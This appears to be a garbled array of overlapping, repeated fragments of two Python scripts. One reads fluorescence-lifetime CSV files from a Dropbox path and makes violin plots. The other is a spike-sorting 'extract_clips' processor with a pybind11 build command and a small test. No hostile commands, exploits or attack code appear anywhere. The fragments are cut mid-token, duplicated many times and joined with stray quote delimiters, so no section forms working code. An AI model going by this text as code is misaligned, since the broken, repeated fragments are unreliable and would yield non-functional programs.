paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\")", "= pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7] # df1 =", "df.iloc[:,0:4] # df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0)", "df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\")", "sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\") plt.ylim(0, 80) plt.savefig(\"C:/Users/harshad/Dropbox/Mfd project/Mfd", "= df.iloc[:,4:7] # df1 = df.iloc[:,0:4] # df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5))", "plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\") plt.ylim(0, 80) plt.savefig(\"C:/Users/harshad/Dropbox/Mfd", "as np import seaborn as sns import matplotlib.pyplot as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd", "on Sat Sep 25 11:19:10 2021 @author: ribis \"\"\" import pandas as pd", "= df.iloc[:,0:4] # df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1,", "utf-8 -*- \"\"\" Created on Sat Sep 25 11:19:10 2021 @author: ribis \"\"\"", "pandas as pd import numpy as np import seaborn as sns import matplotlib.pyplot", "plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd", "ribis \"\"\" import pandas as pd import numpy as np import seaborn as", "11:19:10 2021 @author: ribis \"\"\" import pandas as pd import numpy as np", "sns import matplotlib.pyplot as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") #", "df1 = df.iloc[:,0:4] # df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) #", "# df1 = df.iloc[:,0:4] # df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0)", "as pd import numpy as np import seaborn as sns import matplotlib.pyplot as", "# df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7] #", "pd import numpy as np import seaborn as sns import matplotlib.pyplot as plt", "experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7]", "experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7] # df1 = df.iloc[:,0:4] # df1 = df.iloc[:,7:16]", "numpy as np import seaborn as sns import matplotlib.pyplot as plt df =", "seaborn as sns import matplotlib.pyplot as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer", "coding: utf-8 -*- \"\"\" Created on Sat Sep 25 11:19:10 2021 @author: ribis", "as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd", "Sat Sep 25 11:19:10 2021 @author: ribis \"\"\" import pandas as pd import", "pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7] # df1 = df.iloc[:,0:4]", "paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7] # df1 = df.iloc[:,0:4] # df1 =", "cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\") plt.ylim(0, 80) plt.savefig(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/vioplot_p35_p5_NusG.eps\", dpi=600)", "import pandas as pd import numpy as np import seaborn as sns import", "FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1", "matplotlib.pyplot as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df =", "# df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45,", "\"\"\" Created on Sat Sep 25 11:19:10 2021 @author: ribis \"\"\" import pandas", "@author: ribis \"\"\" import pandas as pd import numpy as np import seaborn", "print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\") plt.ylim(0,", "-*- \"\"\" Created on Sat Sep 25 11:19:10 2021 @author: ribis \"\"\" import", "df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\")", "pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\")" ]
[ "snippet size, aka number of timepoints in a single clip \"\"\" F=readmda(firings) times=F[1,:]", "common import TimeseriesChunkReader # import the C++ code # we no longer use", "import basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding to", "longer use cppimport # import cppimport # cpp=cppimport.imp('basic_cpp') # Do this first: #", "= 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1))", "assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips if __name__ == '__main__': print", "writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips if", ": OUTPUT Path of clips mda file (MxTxL). T=clip_size clip_size : int (Optional)", "t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips if __name__ == '__main__': print ('Running", "first: # g++ -O3 -Wall -shared -std=c++11 -fPIC `python3 -m pybind11 --includes` basic_cpp.cpp", "basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract", "M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10])", "X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4)", "the C++ code # we no longer use cppimport # import cppimport #", "file (MxN) from which to draw the event clips (snippets) firings : INPUT", "to spike events Parameters ---------- timeseries : INPUT Path of timeseries mda file", "assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips if __name__ ==", "extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda')", "are timestamps. clips_out : OUTPUT Path of clips mda file (MxTxL). T=clip_size clip_size", "5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T])", "inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel):", "F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips", "as cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding to spike events", "extract_clips.version=processor_version def test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret)", "use cppimport # import cppimport # cpp=cppimport.imp('basic_cpp') # Do this first: # g++", "event clips (snippets) firings : INPUT Path of firings mda file (RxL) where", "_kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not", "where R>=2 and L is the number of events. Second row are timestamps.", "np import sys,os parent_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader", "of firings mda file (RxL) where R>=2 and L is the number of", "(MxN) from which to draw the event clips (snippets) firings : INPUT Path", "aka snippet size, aka number of timepoints in a single clip \"\"\" F=readmda(firings)", "of clips mda file (MxTxL). T=clip_size clip_size : int (Optional) clip size, aka", "M,N = X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0", "# g++ -O3 -Wall -shared -std=c++11 -fPIC `python3 -m pybind11 --includes` basic_cpp.cpp -o", "clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips if __name__ == '__main__':", "if not TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N =", "is the number of events. Second row are timestamps. clips_out : OUTPUT Path", "-o basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\"", "--extension-suffix` -I../mlpy import basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips", "row are timestamps. clips_out : OUTPUT Path of clips mda file (MxTxL). T=clip_size", "single clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N =", "mda file (RxL) where R>=2 and L is the number of events. Second", "verbose=verbose) if not TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N", "None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L))", "from common import TimeseriesChunkReader # import the C++ code # we no longer", "file (RxL) where R>=2 and L is the number of events. Second row", "# import cppimport # cpp=cppimport.imp('basic_cpp') # Do this first: # g++ -O3 -Wall", "INPUT Path of firings mda file (RxL) where R>=2 and L is the", "return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips extract_clips.name=processor_name", "writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return", "import writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader # import the C++ code # we", "Path of firings mda file (RxL) where R>=2 and L is the number", "overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips():", "(RxL) where R>=2 and L is the number of events. Second row are", "which to draw the event clips (snippets) firings : INPUT Path of firings", "Do this first: # g++ -O3 -Wall -shared -std=c++11 -fPIC `python3 -m pybind11", "`python3 -m pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp as cpp", "as np import sys,os parent_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda from common import", "int (Optional) clip size, aka snippet size, aka number of timepoints in a", "X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size)", "# we no longer use cppimport # import cppimport # cpp=cppimport.imp('basic_cpp') # Do", "of events. Second row are timestamps. clips_out : OUTPUT Path of clips mda", "cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding to spike events Parameters", "R>=2 and L is the number of events. Second row are timestamps. clips_out", "code # we no longer use cppimport # import cppimport # cpp=cppimport.imp('basic_cpp') #", "test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L))", "draw the event clips (snippets) firings : INPUT Path of firings mda file", "extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose)", "clips_out : OUTPUT Path of clips mda file (MxTxL). T=clip_size clip_size : int", "Parameters ---------- timeseries : INPUT Path of timeseries mda file (MxN) from which", "# Do this first: # g++ -O3 -Wall -shared -std=c++11 -fPIC `python3 -m", "TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32)", "clips mda file (MxTxL). T=clip_size clip_size : int (Optional) clip size, aka snippet", "a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips if __name__ == '__main__': print ('Running test')", ": INPUT Path of firings mda file (RxL) where R>=2 and L is", "C++ code # we no longer use cppimport # import cppimport # cpp=cppimport.imp('basic_cpp')", "g++ -O3 -Wall -shared -std=c++11 -fPIC `python3 -m pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config", "from mlpy import writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader # import the C++ code", "X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True", "F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True", "to draw the event clips (snippets) firings : INPUT Path of firings mda", "mlpy import writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader # import the C++ code #", "the number of events. Second row are timestamps. clips_out : OUTPUT Path of", "return None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda')", "numpy as np import sys,os parent_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda from common", "Path of timeseries mda file (MxN) from which to draw the event clips", "number of timepoints in a single clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out)", "events Parameters ---------- timeseries : INPUT Path of timeseries mda file (MxN) from", "import the C++ code # we no longer use cppimport # import cppimport", "TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def", "import TimeseriesChunkReader # import the C++ code # we no longer use cppimport", "extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding to spike events Parameters ---------- timeseries : INPUT", "timeseries mda file (MxN) from which to draw the event clips (snippets) firings", "writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader # import the C++ code # we no", "\"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size", "firings mda file (RxL) where R>=2 and L is the number of events.", "OUTPUT Path of clips mda file (MxTxL). T=clip_size clip_size : int (Optional) clip", "-O3 -Wall -shared -std=c++11 -fPIC `python3 -m pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix`", "parent_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader # import the", "def test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda')", "-Wall -shared -std=c++11 -fPIC `python3 -m pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy", "return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L))", "clip size, aka snippet size, aka number of timepoints in a single clip", "np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips if __name__ == '__main__': print ('Running test') test_extract_clips()", "sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader # import the C++", "sys,os parent_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader # import", "of timeseries mda file (MxN) from which to draw the event clips (snippets)", "we no longer use cppimport # import cppimport # cpp=cppimport.imp('basic_cpp') # Do this", "clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel): return None", "\"\"\" Extract clips corresponding to spike events Parameters ---------- timeseries : INPUT Path", "not TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N = 5,100,100,1000", "of timepoints in a single clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def", "clip_size : int (Optional) clip size, aka snippet size, aka number of timepoints", "a single clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N", "--includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1' def", "cppimport # import cppimport # cpp=cppimport.imp('basic_cpp') # Do this first: # g++ -O3", "# import the C++ code # we no longer use cppimport # import", "clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2()", "ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips if __name__", "spike events Parameters ---------- timeseries : INPUT Path of timeseries mda file (MxN)", "the event clips (snippets) firings : INPUT Path of firings mda file (RxL)", "basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100):", "-std=c++11 -fPIC `python3 -m pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp", "number of events. Second row are timestamps. clips_out : OUTPUT Path of clips", "L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100,", "-fPIC `python3 -m pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp as", "INPUT Path of timeseries mda file (MxN) from which to draw the event", "corresponding to spike events Parameters ---------- timeseries : INPUT Path of timeseries mda", "size, aka number of timepoints in a single clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size)", "-shared -std=c++11 -fPIC `python3 -m pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy import", "-m pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp as cpp processor_name='pyms.extract_clips'", "timeseries : INPUT Path of timeseries mda file (MxN) from which to draw", "size, aka snippet size, aka number of timepoints in a single clip 